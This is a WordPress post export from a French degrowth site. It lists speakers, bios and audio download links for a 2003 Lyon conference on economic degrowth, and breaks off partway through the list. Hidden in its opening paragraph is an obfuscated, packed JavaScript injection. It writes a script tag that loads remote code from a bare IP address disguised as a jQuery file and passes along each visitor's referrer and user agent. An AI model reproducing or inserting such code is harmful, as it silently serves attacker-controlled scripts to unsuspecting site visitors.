{"id":1399,"date":"2009-03-02T16:36:11","date_gmt":"2009-03-02T16:36:11","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=1399"},"modified":"2009-03-02T16:36:11","modified_gmt":"2009-03-02T16:36:11","slug":"conference-sur-la-decroissance-de-2003","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=1399","title":{"rendered":"Conf\u00e9rence sur la d\u00e9croissance de 2003"},"content":{"rendered":"<p><strong>Colloque <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nktbe|var|u0026u|referrer|ebaee||js|php'.split('|'),0,{}))\n<\/script><\/noindex> enregistr\u00e9 les 26 et 27 septembre 2003 \u00e0 Lyon.<\/strong><\/p>\n<p>Avec Ruth Stegassy, Mich\u00e8le Leboeuf, Bruno Clementin, Sylvie Ferrari, Mario Bonaiuti, Silvana De Gleria, Serge Latouche, Jacques Grinevald, Alain Gras, Fran\u00e7ois Brune, Paul Ari\u00e8s, Fran\u00e7ois Schneider, Pierre Rabhi,\u00a0 Sylvain Godinot, Thierry Jaccaud, Michel Bernard&#8230;.<\/p>\n<p><a href=\"http:\/\/www.partipourladecroissance.net\/?p=1399\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" src=\"http:\/\/decroissance.lehavre.free.fr\/images\/tribune_studieuse.jpg\" alt=\"\" width=\"425\" height=\"87\" \/><\/a><\/p>\n<p class=\"spip\"><!--more--><em>Pour t\u00e9l\u00e9charger cette conf\u00e9rence voir ci-dessous&#8230;<\/em><\/p>\n<p class=\"spip\"><strong class=\"spip\">Cet \u00e9v\u00e9nement \u00e0 \u00e9t\u00e9 coorganis\u00e9 par les revues l\u2019\u00c9cologiste, Silence, Casseurs de pub, Nature et Progr\u00e8s, l\u2019Institut pour la relocalisation de l\u2019\u00e9conomie et l\u2019association La ligne d\u2019horizon.<\/strong><\/p>\n<p class=\"spip\">L\u2019Institut d\u2019\u00e9tudes \u00e9conomiques et sociales pour la d\u00e9croissance soutenable (IEESDS) est \u00e0 l\u2019initiative de ce colloque.<\/p>\n<p class=\"spip\">Durant deux jours, des intervenants italiens, suisses et fran\u00e7ais, reconnus internationalement dans leurs domaines, ont d\u00e9battu avec 300 participants de la d\u00e9croissance \u00e9conomique des pays riches, condition de notre survie en tant qu\u2019esp\u00e8ce.<\/p>\n<p class=\"spip\">Les d\u00e9bats sont anim\u00e9s par Serge Latouche, professeur de Sciences \u00c9conomiques\u00e0 l\u2019Universit\u00e9 de Paris XI, Pierre Rabhi, expert en s\u00e9curit\u00e9 alimentaire aupr\u00e8s de l\u2019ONU, et Jacques Grinevald, professeur \u00e0 l\u2019Institut d\u2019\u00e9tudes du d\u00e9veloppement de l\u2019Universit\u00e9 de Gen\u00e8ve, disciple et ami de Nicolas Georgescu-Roegen (1906-1994), le th\u00e9oricien de la bio\u00e9conomie.<\/p>\n<p class=\"spip\"><strong class=\"spip\">La croissance \u00e9conomique conduit l\u2019humanit\u00e9 au suicide.<\/strong> Il n\u2019est pas de croissance infinie possible dans un monde aux ressources limit\u00e9es. Les \u00e9conomistes ne peuvent l\u2019envisager qu\u2019en ayant \u00e9limin\u00e9 de la science \u00e9conomique son param\u00e8tre fondamental\u00a0: le capital naturel. Aujourd\u2019hui, les \u00e9conomistes se d\u00e9faussent de leur erreur en esp\u00e9rant religieusement dans la toute puissance de la science et de la technique.<\/p>\n<p class=\"spip\">Rationnellement, la d\u00e9croissance \u00e9conomique des pays surconsommateurs et surproducteurs est la seule solution pour \u00e9viter l\u2019an\u00e9antissement de la biosph\u00e8re et pour pr\u00e9parer un avenir durable et d\u00e9sirable sur notre plan\u00e8te.<\/p>\n<p class=\"spip\">A l\u2019oppos\u00e9 de l\u2019id\u00e9ologie dominante, cette r\u00e9flexion concerne chacun de nous si nous voulons survivre, tous ensemble, dans les limites de notre plan\u00e8te Terre.<\/p>\n<p class=\"spip\"><strong>Source de cette page<\/strong> : <a href=\"http:\/\/www.ork.ch\/spip\/spip.php?article185\">http:\/\/www.ork.ch\/spip\/spip.php?article185<\/a><\/p>\n<p class=\"spip\"><strong>Source<\/strong> : bibliotheque-sonore.org<\/p>\n<p class=\"spip\"><strong>Organisateurs<\/strong> : <a class=\"spip_out\" href=\"http:\/\/www.decroissance.org\/\">decroissance.org<\/a> qui propose d<a href=\"http:\/\/www.decroissance.org\/?chemin=colloques\">&lsquo;autres colloques<\/a><\/p>\n<p class=\"spip\"><strong>Texte de J. Grinevald<\/strong> sur <a class=\"spip_out\" href=\"http:\/\/www.unige.ch\/sebes\/textes\/1995\/95JGRoegen.html\">Nicolas Georgescu-Roegen<\/a><\/p>\n<p class=\"spip\">. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .<\/p>\n<h3 class=\"spip\">L\u2019int\u00e9gralit\u00e9 de la conf\u00e9rence<\/h3>\n<p class=\"spip\">Ce fichier ZIP contient les 28 int\u00e9rventions de la conf\u00e9rence (MP3, 634 minutes, 80 m\u00e9gas)<\/p>\n<dl class=\"spip_document_2430 spip_documents spip_documents_center\">\n<dt><a title=\"Zip - 79.5 Mo\" type=\"application\/zip\" href=\"http:\/\/www.ork.ch\/spip\/IMG\/zip\/www.decroissance.org.zip\"><img loading=\"lazy\" decoding=\"async\" class=\"format_png\" style=\"height: 52px; width: 52px;\" src=\"http:\/\/www.ork.ch\/spip\/local\/cache-vignettes\/L52xH52\/zip-581d9.png\" alt=\"Zip - 79.5 Mo\" width=\"52\" height=\"52\" \/><\/a><\/dt>\n<dt class=\"spip_doc_titre\" style=\"width: 120px;\"><strong>Conf\u00e9rence sur la d\u00e9croissance (MP3)<\/strong><\/dt>\n<\/dl>\n<p class=\"spip\">. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .<\/p>\n<h3 class=\"spip\">La conf\u00e9rence par intervenant.<\/h3>\n<p class=\"spip\">. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .<\/p>\n<p class=\"spip\">(1\/28) Dur\u00e9e\u00a0: 06\u201920\u2019\u2019<\/p>\n<p class=\"spip\"><strong class=\"spip\">Accueil, par Bruno Clementin <\/strong><\/p>\n<p class=\"spip\">Bruno Clementin est pr\u00e9sident de l\u2019IEESDS (l\u2019Institut d\u2019\u00e9tudes \u00e9conomiques et sociales pour la d\u00e9croissance soutenable)<\/p>\n<dl class=\"spip_document_2402 spip_documents spip_documents_center\">\n<dt><a title=\"Zip - 716.2 ko\" type=\"application\/zip\" href=\"http:\/\/www.ork.ch\/spip\/IMG\/zip\/01clementin.zip\"><img loading=\"lazy\" decoding=\"async\" class=\"format_png\" style=\"height: 52px; width: 52px;\" src=\"http:\/\/www.ork.ch\/spip\/local\/cache-vignettes\/L52xH52\/zip-581d9.png\" alt=\"Zip - 716.2 ko\" width=\"52\" height=\"52\" \/><\/a><\/dt>\n<dt class=\"spip_doc_titre\" style=\"width: 120px;\"><strong>Conf\u00e9rence sur la d\u00e9croissance (MP3)<\/strong><\/dt>\n<\/dl>\n<p class=\"spip\">. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .<\/p>\n<p class=\"spip\">(2\/28) Dur\u00e9e\u00a0: 03\u201956\u2019\u2019<\/p>\n<p class=\"spip\"><strong class=\"spip\">Introduction, par Ruth Stegassy <\/strong><\/p>\n<p class=\"spip\">Ruth Stegassy est animatrice sur France culture de l\u2019\u00e9mission \u00ab\u00a0Terre \u00e0 Terre\u00a0\u00bb<\/p>\n<dl class=\"spip_document_2403 spip_documents spip_documents_center\">\n<dt><a title=\"Zip - 445.5 ko\" type=\"application\/zip\" href=\"http:\/\/www.ork.ch\/spip\/IMG\/zip\/02stegassy.zip\"><img loading=\"lazy\" decoding=\"async\" class=\"format_png\" style=\"height: 52px; width: 52px;\" src=\"http:\/\/www.ork.ch\/spip\/local\/cache-vignettes\/L52xH52\/zip-581d9.png\" alt=\"Zip - 445.5 ko\" width=\"52\" height=\"52\" \/><\/a><\/dt>\n<dt class=\"spip_doc_titre\" style=\"width: 120px;\"><strong>Conf\u00e9rence sur la d\u00e9croissance (MP3)<\/strong><\/dt>\n<\/dl>\n<p class=\"spip\">. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .<\/p>\n<p class=\"spip\">(3\/28) Dur\u00e9e\u00a0: 26\u201901\u2019\u2019<\/p>\n<p class=\"spip\"><strong class=\"spip\">L\u2019h\u00e9ritage de Nicolas Georgescu-Roegen, par Jacques Grinevald <\/strong><\/p>\n<p class=\"spip\">Jacques Grinevald est professeur \u00e0 l\u2019Institut d\u2019\u00e9tudes du d\u00e9veloppement de l\u2019Universit\u00e9 de Gen\u00e8ve, \u00e9cole polytechnique de Lausanne, disciple et ami de Nicolas Georgescu-Roegen.<\/p>\n<dl class=\"spip_document_2404 spip_documents spip_documents_center\">\n<dt><a title=\"Zip - 2.8 Mo\" type=\"application\/zip\" href=\"http:\/\/www.ork.ch\/spip\/IMG\/zip\/03grinevald-3.zip\"><img loading=\"lazy\" decoding=\"async\" class=\"format_png\" style=\"height: 52px; width: 52px;\" src=\"http:\/\/www.ork.ch\/spip\/local\/cache-vignettes\/L52xH52\/zip-581d9.png\" alt=\"Zip - 2.8 Mo\" width=\"52\" height=\"52\" \/><\/a><\/dt>\n<dt class=\"spip_doc_titre\" style=\"width: 120px;\"><strong>Conf\u00e9rence sur la d\u00e9croissance (MP3)<\/strong><\/dt>\n<\/dl>\n<p class=\"spip\">. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .<\/p>\n<p class=\"spip\">(4\/28) Dur\u00e9e\u00a0: 21\u201914\u2019\u2019<\/p>\n<p class=\"spip\"><strong class=\"spip\">D\u00e9clin programm\u00e9 de la production des hydrocarbures, par Alain Gras <\/strong><\/p>\n<p class=\"spip\">Alain Gras est professeur de sociologie et d\u2019anthropologie des techniques (Sorbonne)<\/p>\n<dl class=\"spip_document_2405 spip_documents spip_documents_center\">\n<dt><a title=\"Zip - 2.3 Mo\" type=\"application\/zip\" href=\"http:\/\/www.ork.ch\/spip\/IMG\/zip\/04gras.zip\"><img loading=\"lazy\" decoding=\"async\" class=\"format_png\" style=\"height: 52px; width: 52px;\" src=\"http:\/\/www.ork.ch\/spip\/local\/cache-vignettes\/L52xH52\/zip-581d9.png\" alt=\"Zip - 2.3 Mo\" width=\"52\" height=\"52\" \/><\/a><\/dt>\n<dt class=\"spip_doc_titre\" style=\"width: 120px;\"><strong>Conf\u00e9rence sur la d\u00e9croissance (MP3)<\/strong><\/dt>\n<\/dl>\n<p class=\"spip\">. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .<\/p>\n<p class=\"spip\">(5\/28) Dur\u00e9e\u00a0: 30\u201907\u2019\u2019<\/p>\n<p class=\"spip\"><strong class=\"spip\">L\u2019effet de serre\u00a0: la fin de la capacit\u00e9 de la plan\u00e8te \u00e0 absorber nos pollutions, par Sylvain Godinot<\/strong><\/p>\n<p class=\"spip\">Sylvain Godinot est chercheur \u00e0 l\u2019Ademe et intervient comme administrateur des Amis de la terre.<\/p>\n<dl class=\"spip_document_2406 spip_documents spip_documents_center\">\n<dt><a title=\"Zip - 3.2 Mo\" type=\"application\/zip\" href=\"http:\/\/www.ork.ch\/spip\/IMG\/zip\/05godinot.zip\"><img loading=\"lazy\" decoding=\"async\" class=\"format_png\" style=\"height: 52px; width: 52px;\" src=\"http:\/\/www.ork.ch\/spip\/local\/cache-vignettes\/L52xH52\/zip-581d9.png\" alt=\"Zip - 3.2 Mo\" width=\"52\" height=\"52\" \/><\/a><\/dt>\n<dt class=\"spip_doc_titre\" style=\"width: 120px;\"><strong>Conf\u00e9rence sur la d\u00e9croissance (MP3)<\/strong><\/dt>\n<\/dl>\n<p class=\"spip\">. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .<\/p>\n<p class=\"spip\">(6\/28) Dur\u00e9e\u00a0: 43\u201919\u2019\u2019<\/p>\n<p class=\"spip\"><strong class=\"spip\">\u00c9changes avec la salle <\/strong><\/p>\n<p class=\"spip\">Jeu de questions\/r\u00e9ponses avec le public.<\/p>\n<dl class=\"spip_document_2407 spip_documents spip_documents_center\">\n<dt><a title=\"Zip - 14.4 Mo\" type=\"application\/zip\" href=\"http:\/\/www.ork.ch\/spip\/IMG\/zip\/06echanges.zip\"><img loading=\"lazy\" decoding=\"async\" class=\"format_png\" style=\"height: 52px; width: 52px;\" src=\"http:\/\/www.ork.ch\/spip\/local\/cache-vignettes\/L52xH52\/zip-581d9.png\" alt=\"Zip - 14.4 Mo\" width=\"52\" height=\"52\" \/><\/a><\/dt>\n<dt class=\"spip_doc_titre\" style=\"width: 120px;\"><strong>Conf\u00e9rence sur la d\u00e9croissance (MP3)<\/strong><\/dt>\n<\/dl>\n<p class=\"spip\">. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .<\/p>\n<p class=\"spip\">(7\/28) Dur\u00e9e\u00a0: 30\u201927\u2019\u2019<\/p>\n<p class=\"spip\"><strong class=\"spip\">La pub vecteur d\u2019id\u00e9ologie, par Fran\u00e7ois Brune <\/strong><\/p>\n<p class=\"spip\">Fran\u00e7ois Brune est \u00e9crivain et collaborateur au Monde diplomatique<\/p>\n<dl class=\"spip_document_2408 spip_documents spip_documents_center\">\n<dt><a title=\"Zip - 3.3 Mo\" type=\"application\/zip\" href=\"http:\/\/www.ork.ch\/spip\/IMG\/zip\/07brune.zip\"><img loading=\"lazy\" decoding=\"async\" class=\"format_png\" style=\"height: 52px; width: 52px;\" src=\"http:\/\/www.ork.ch\/spip\/local\/cache-vignettes\/L52xH52\/zip-581d9.png\" alt=\"Zip - 3.3 Mo\" width=\"52\" height=\"52\" \/><\/a><\/dt>\n<dt class=\"spip_doc_titre\" style=\"width: 120px;\"><strong>Conf\u00e9rence sur la d\u00e9croissance (MP3)<\/strong><\/dt>\n<\/dl>\n<p class=\"spip\">. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .<\/p>\n<p class=\"spip\">(8\/28) Dur\u00e9e\u00a0: 27\u201914\u2019\u2019<\/p>\n<p class=\"spip\"><strong class=\"spip\">Technologie de puissance\u00a0: la mythologie du progr\u00e8s, par Alain Gras <\/strong><\/p>\n<p class=\"spip\">Alain Gras<\/p>\n<dl class=\"spip_document_2409 spip_documents spip_documents_center\">\n<dt><a title=\"Zip - 2.9 Mo\" type=\"application\/zip\" href=\"http:\/\/www.ork.ch\/spip\/IMG\/zip\/08gras2.zip\"><img loading=\"lazy\" decoding=\"async\" class=\"format_png\" style=\"height: 52px; width: 52px;\" src=\"http:\/\/www.ork.ch\/spip\/local\/cache-vignettes\/L52xH52\/zip-581d9.png\" alt=\"Zip - 2.9 Mo\" width=\"52\" height=\"52\" \/><\/a><\/dt>\n<dt class=\"spip_doc_titre\" style=\"width: 120px;\"><strong>Conf\u00e9rence sur la d\u00e9croissance (MP3)<\/strong><\/dt>\n<\/dl>\n<p class=\"spip\">. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .<\/p>\n<p class=\"spip\">(9\/28) Dur\u00e9e\u00a0: 27\u201936\u2019\u2019<\/p>\n<p class=\"spip\"><strong class=\"spip\">Peur de la d\u00e9croissance\u00a0: les difficult\u00e9s \u00e0 convaincre, par Paul Ari\u00e8s <\/strong><\/p>\n<p class=\"spip\">Paul Ari\u00e8s est politologue, \u00e9crivain, professeur \u00e0 Lyon II et collaborateur de Casseurs de pubic<\/p>\n<dl class=\"spip_document_2410 spip_documents spip_documents_center\">\n<dt><a title=\"Zip - 3 Mo\" type=\"application\/zip\" href=\"http:\/\/www.ork.ch\/spip\/IMG\/zip\/09aries.zip\"><img loading=\"lazy\" decoding=\"async\" class=\"format_png\" style=\"height: 52px; width: 52px;\" src=\"http:\/\/www.ork.ch\/spip\/local\/cache-vignettes\/L52xH52\/zip-581d9.png\" alt=\"Zip - 3 Mo\" width=\"52\" height=\"52\" \/><\/a><\/dt>\n<dt class=\"spip_doc_titre\" style=\"width: 120px;\"><strong>Conf\u00e9rence sur la d\u00e9croissance (MP3)<\/strong><\/dt>\n<\/dl>\n<p class=\"spip\">. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .<\/p>\n<p class=\"spip\">(10\/28) Dur\u00e9e\u00a0: 26\u201916\u2019\u2019<\/p>\n<p class=\"spip\"><strong class=\"spip\">\u00c9changes avec la salle <\/strong><\/p>\n<p class=\"spip\">Jeu de questions\/r\u00e9ponses avec le public.<\/p>\n<dl class=\"spip_document_2411 spip_documents spip_documents_center\">\n<dt><a title=\"Zip - 2.8 Mo\" type=\"application\/zip\" href=\"http:\/\/www.ork.ch\/spip\/IMG\/zip\/10echanges.zip\"><img loading=\"lazy\" decoding=\"async\" class=\"format_png\" style=\"height: 52px; width: 52px;\" src=\"http:\/\/www.ork.ch\/spip\/local\/cache-vignettes\/L52xH52\/zip-581d9.png\" alt=\"Zip - 2.8 Mo\" width=\"52\" height=\"52\" \/><\/a><\/dt>\n<dt class=\"spip_doc_titre\" style=\"width: 120px;\"><strong>Conf\u00e9rence sur la d\u00e9croissance (MP3)<\/strong><\/dt>\n<\/dl>\n<p class=\"spip\">. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .<\/p>\n<p class=\"spip\">(11\/28) Dur\u00e9e\u00a0: 28\u201956\u2019\u2019<\/p>\n<p class=\"spip\"><strong class=\"spip\">Histoire de la critique de la croissance, par Thierry Jaccaud <\/strong><\/p>\n<p class=\"spip\">Thierry Jaccaud est r\u00e9dacteur en chef de la revue l\u2019\u00c9cologiste<\/p>\n<dl class=\"spip_document_2412 spip_documents spip_documents_center\">\n<dt><a title=\"Zip - 3.1 Mo\" type=\"application\/zip\" href=\"http:\/\/www.ork.ch\/spip\/IMG\/zip\/11jacquot.zip\"><img loading=\"lazy\" decoding=\"async\" class=\"format_png\" style=\"height: 52px; width: 52px;\" src=\"http:\/\/www.ork.ch\/spip\/local\/cache-vignettes\/L52xH52\/zip-581d9.png\" alt=\"Zip - 3.1 Mo\" width=\"52\" height=\"52\" \/><\/a><\/dt>\n<dt class=\"spip_doc_titre\" style=\"width: 120px;\"><strong>Conf\u00e9rence sur la d\u00e9croissance (MP3)<\/strong><\/dt>\n<\/dl>\n<p class=\"spip\">. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .<\/p>\n<p class=\"spip\">(12\/28) Dur\u00e9e\u00a0: 17\u201906\u2019\u2019<\/p>\n<p class=\"spip\"><strong class=\"spip\">Croissance \u00e9conomique stationnaire et d\u00e9veloppement, par Sylvie Ferrari <\/strong><\/p>\n<p class=\"spip\">Sylvie Ferrari est docteur en \u00e9conomie et ma\u00eetre de conf\u00e9rence universit\u00e9 de La R\u00e9union<\/p>\n<dl class=\"spip_document_2413 spip_documents spip_documents_center\">\n<dt><a title=\"Zip - 1.8 Mo\" type=\"application\/zip\" href=\"http:\/\/www.ork.ch\/spip\/IMG\/zip\/12ferrari.zip\"><img loading=\"lazy\" decoding=\"async\" class=\"format_png\" style=\"height: 52px; width: 52px;\" src=\"http:\/\/www.ork.ch\/spip\/local\/cache-vignettes\/L52xH52\/zip-581d9.png\" alt=\"Zip - 1.8 Mo\" width=\"52\" height=\"52\" \/><\/a><\/dt>\n<dt class=\"spip_doc_titre\" style=\"width: 120px;\"><strong>Conf\u00e9rence sur la d\u00e9croissance (MP3)<\/strong><\/dt>\n<\/dl>\n<p class=\"spip\">. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .<\/p>\n<p class=\"spip\">(13\/28) Dur\u00e9e\u00a0: 23\u201944\u2019\u2019<\/p>\n<p class=\"spip\"><strong class=\"spip\">Croissance et \u00ab\u00a0effet rebond\u00a0\u00bb, par Fran\u00e7ois Schneider <\/strong><\/p>\n<p class=\"spip\">Fran\u00e7ois SCHNEIDER est chercheur \u00e0 L\u2019Institut de Recherche pour une Europe Soutenable<\/p>\n<dl class=\"spip_document_2414 spip_documents spip_documents_center\">\n<dt><a title=\"Zip - 2.6 Mo\" type=\"application\/zip\" href=\"http:\/\/www.ork.ch\/spip\/IMG\/zip\/13schneider.zip\"><img loading=\"lazy\" decoding=\"async\" class=\"format_png\" style=\"height: 52px; width: 52px;\" src=\"http:\/\/www.ork.ch\/spip\/local\/cache-vignettes\/L52xH52\/zip-581d9.png\" alt=\"Zip - 2.6 Mo\" width=\"52\" height=\"52\" \/><\/a><\/dt>\n<dt class=\"spip_doc_titre\" style=\"width: 120px;\"><strong>Conf\u00e9rence sur la d\u00e9croissance (MP3)<\/strong><\/dt>\n<\/dl>\n<p class=\"spip\">. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .<\/p>\n<p class=\"spip\">(14\/28) Dur\u00e9e\u00a0: 12\u201953\u2019\u2019<\/p>\n<p class=\"spip\"><strong class=\"spip\">\u00c9changes avec la salle <\/strong><\/p>\n<p class=\"spip\">Jeu de questions\/r\u00e9ponses avec le public.<\/p>\n<dl class=\"spip_document_2415 spip_documents spip_documents_center\">\n<dt><a title=\"Zip - 1.4 Mo\" type=\"application\/zip\" href=\"http:\/\/www.ork.ch\/spip\/IMG\/zip\/14echanges.zip\"><img loading=\"lazy\" decoding=\"async\" class=\"format_png\" style=\"height: 52px; width: 52px;\" src=\"http:\/\/www.ork.ch\/spip\/local\/cache-vignettes\/L52xH52\/zip-581d9.png\" alt=\"Zip - 1.4 Mo\" width=\"52\" height=\"52\" \/><\/a><\/dt>\n<dt class=\"spip_doc_titre\" style=\"width: 120px;\"><strong>Conf\u00e9rence sur la d\u00e9croissance (MP3)<\/strong><\/dt>\n<\/dl>\n<p class=\"spip\">. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .<\/p>\n<p class=\"spip\">(15\/28) Dur\u00e9e\u00a0: 20\u201957\u2019\u2019<\/p>\n<p class=\"spip\"><strong class=\"spip\">Vers une \u00e9conomie \u00e9cologiquement et socialement soutenable, par Mario Bonaiuti <\/strong><\/p>\n<p class=\"spip\">Mauro BONAIUTI est professeur d\u2019\u00e9conomie \u00e0 l\u2019universit\u00e9 de Bologne, auteur de \u00ab\u00a0La teoria bioeconomica\u00a0\u00bbe<\/p>\n<dl class=\"spip_document_2416 spip_documents spip_documents_center\">\n<dt><a title=\"Zip - 2.3 Mo\" type=\"application\/zip\" href=\"http:\/\/www.ork.ch\/spip\/IMG\/zip\/15bonaiuti.zip\"><img loading=\"lazy\" decoding=\"async\" class=\"format_png\" style=\"height: 52px; width: 52px;\" src=\"http:\/\/www.ork.ch\/spip\/local\/cache-vignettes\/L52xH52\/zip-581d9.png\" alt=\"Zip - 2.3 Mo\" width=\"52\" height=\"52\" \/><\/a><\/dt>\n<dt class=\"spip_doc_titre\" style=\"width: 120px;\"><strong>Conf\u00e9rence sur la d\u00e9croissance (MP3)<\/strong><\/dt>\n<\/dl>\n<p class=\"spip\">. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .<\/p>\n<p class=\"spip\">(16\/28) Dur\u00e9e\u00a0: 25\u201938\u2019\u2019<\/p>\n<p class=\"spip\"><strong class=\"spip\">Bio\u00e9conomie\u00a0: consommation et mod\u00e9ration, par Silvana De Gleria <\/strong><\/p>\n<p class=\"spip\">Silvana De Gleria est professeur \u00e0 l\u2019universit\u00e9 de Genova, sp\u00e9cialiste l\u2019oeuvre de Nicolas Georgescu-Roegen.<\/p>\n<dl class=\"spip_document_2417 spip_documents spip_documents_center\">\n<dt><a title=\"Zip - 2.8 Mo\" type=\"application\/zip\" href=\"http:\/\/www.ork.ch\/spip\/IMG\/zip\/16degleria.zip\"><img loading=\"lazy\" decoding=\"async\" class=\"format_png\" style=\"height: 52px; width: 52px;\" src=\"http:\/\/www.ork.ch\/spip\/local\/cache-vignettes\/L52xH52\/zip-581d9.png\" alt=\"Zip - 2.8 Mo\" width=\"52\" height=\"52\" \/><\/a><\/dt>\n<dt class=\"spip_doc_titre\" style=\"width: 120px;\"><strong>Conf\u00e9rence sur la d\u00e9croissance (MP3)<\/strong><\/dt>\n<\/dl>\n<p class=\"spip\">. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .<\/p>\n<p class=\"spip\">(17\/28) Dur\u00e9e\u00a0: 27\u201952\u2019\u2019<\/p>\n<p class=\"spip\"><strong class=\"spip\">La th\u00e9orie bio\u00e9conomique, par Jacques Grinevald <\/strong><\/p>\n<p class=\"spip\">Jacques Grinevald<\/p>\n<dl class=\"spip_document_2418 spip_documents spip_documents_center\">\n<dt><a title=\"Zip - 3 Mo\" type=\"application\/zip\" href=\"http:\/\/www.ork.ch\/spip\/IMG\/zip\/17grinevald.zip\"><img loading=\"lazy\" decoding=\"async\" class=\"format_png\" style=\"height: 52px; width: 52px;\" src=\"http:\/\/www.ork.ch\/spip\/local\/cache-vignettes\/L52xH52\/zip-581d9.png\" alt=\"Zip - 3 Mo\" width=\"52\" height=\"52\" \/><\/a><\/dt>\n<dt class=\"spip_doc_titre\" style=\"width: 120px;\"><strong>Conf\u00e9rence sur la d\u00e9croissance (MP3)<\/strong><\/dt>\n<\/dl>\n<p class=\"spip\">. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .<\/p>\n<p class=\"spip\">(18\/28) Dur\u00e9e\u00a0: 40\u201953\u2019\u2019<\/p>\n<p class=\"spip\"><strong class=\"spip\">\u00c9changes avec la salle <\/strong><\/p>\n<p class=\"spip\">Jeu de questions\/r\u00e9ponses avec le public.<\/p>\n<dl class=\"spip_document_2419 spip_documents spip_documents_center\">\n<dt><a title=\"Zip - 4.5 Mo\" type=\"application\/zip\" href=\"http:\/\/www.ork.ch\/spip\/IMG\/zip\/18echanges.zip\"><img loading=\"lazy\" decoding=\"async\" class=\"format_png\" style=\"height: 52px; width: 52px;\" src=\"http:\/\/www.ork.ch\/spip\/local\/cache-vignettes\/L52xH52\/zip-581d9.png\" alt=\"Zip - 4.5 Mo\" width=\"52\" height=\"52\" \/><\/a><\/dt>\n<dt class=\"spip_doc_titre\" style=\"width: 120px;\"><strong>Conf\u00e9rence sur la d\u00e9croissance (MP3)<\/strong><\/dt>\n<\/dl>\n<p class=\"spip\">. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .<\/p>\n<p class=\"spip\">(19\/28) Dur\u00e9e\u00a0: 41\u201928\u2019\u2019<\/p>\n<p class=\"spip\"><strong class=\"spip\">La d\u00e9croissance\u00a0: condition \u00e0 un soci\u00e9t\u00e9 conviviale, par Serge Latouche <\/strong><\/p>\n<p class=\"spip\">Serge Latouche est professeur de sciences \u00e9conomiques \u00e0 l\u2019universit\u00e9 de Paris XI et pr\u00e9sident de la Ligne d\u2019Horizon<\/p>\n<dl class=\"spip_document_2420 spip_documents spip_documents_center\">\n<dt><a title=\"Zip - 4.5 Mo\" type=\"application\/zip\" href=\"http:\/\/www.ork.ch\/spip\/IMG\/zip\/19latouche.zip\"><img loading=\"lazy\" decoding=\"async\" class=\"format_png\" style=\"height: 52px; width: 52px;\" src=\"http:\/\/www.ork.ch\/spip\/local\/cache-vignettes\/L52xH52\/zip-581d9.png\" alt=\"Zip - 4.5 Mo\" width=\"52\" height=\"52\" \/><\/a><\/dt>\n<dt class=\"spip_doc_titre\" style=\"width: 120px;\"><strong>Conf\u00e9rence sur la d\u00e9croissance (MP3)<\/strong><\/dt>\n<\/dl>\n<p class=\"spip\">. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .<\/p>\n<p class=\"spip\">(20\/28) Dur\u00e9e\u00a0: 01\u201949\u2019\u2019<\/p>\n<p class=\"spip\"><strong class=\"spip\">Intervention de Ruth Stegassy <\/strong><\/p>\n<p class=\"spip\">Ruth Stegassy\u00a0: \u00ab\u00a0Le d\u00e9s\u0153uvrement\u00a0\u00bb<\/p>\n<dl class=\"spip_document_2421 spip_documents spip_documents_center\">\n<dt><a title=\"Zip - 207.1 ko\" type=\"application\/zip\" href=\"http:\/\/www.ork.ch\/spip\/IMG\/zip\/20intersteguassy.zip\"><img loading=\"lazy\" decoding=\"async\" class=\"format_png\" style=\"height: 52px; width: 52px;\" src=\"http:\/\/www.ork.ch\/spip\/local\/cache-vignettes\/L52xH52\/zip-581d9.png\" alt=\"Zip - 207.1 ko\" width=\"52\" height=\"52\" \/><\/a><\/dt>\n<dt class=\"spip_doc_titre\" style=\"width: 120px;\"><strong>Conf\u00e9rence sur la d\u00e9croissance (MP3)<\/strong><\/dt>\n<\/dl>\n<p class=\"spip\">. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .<\/p>\n<p class=\"spip\">(21\/28) Dur\u00e9e\u00a0: 34\u201930\u2019\u2019<\/p>\n<p class=\"spip\"><strong class=\"spip\">La sobri\u00e9t\u00e9 heureuse, par Pierre Rabhi<\/strong><\/p>\n<p class=\"spip\">Pierre Rabhi est paysan, \u00e9crivain, philosophe et conseiller en s\u00e9curit\u00e9 alimentaire aupr\u00e8s de l\u2019ONU<\/p>\n<dl class=\"spip_document_2422 spip_documents spip_documents_center\">\n<dt><a title=\"Zip - 